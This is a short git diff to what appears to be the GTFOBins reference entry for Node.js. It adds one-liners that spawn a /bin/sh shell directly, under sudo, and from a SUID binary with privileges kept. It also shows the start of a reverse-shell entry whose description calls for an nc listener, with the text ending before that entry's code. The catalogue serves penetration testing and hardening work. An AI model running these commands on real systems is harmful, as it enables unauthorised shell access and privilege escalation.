diff --git a/_gtfobins/node.md b/_gtfobins/node.md index 5532d4b..11c14d0 100644 --- a/_gtfobins/node.md +++ b/_gtfobins/node.md @@ -1,5 +1,14 @@ --- functions: + exec-interactive: + - code: | + node -e 'require("child_process").spawn("/bin/sh", [], { stdio: [0, 1, 2]});' + sudo-enabled: + - code: | + sudo node -e 'require("child_process").spawn("/bin/sh", [], { stdio: [0, 1, 2]});' + suid-enabled: + - code: | + ./node -e 'require("child_process").spawn("/bin/sh", [ "-p" ], { stdio: [0, 1, 2]});' reverse-shell: - description: Run `nc -l -p 12345` to receive the shell on the other end. code: |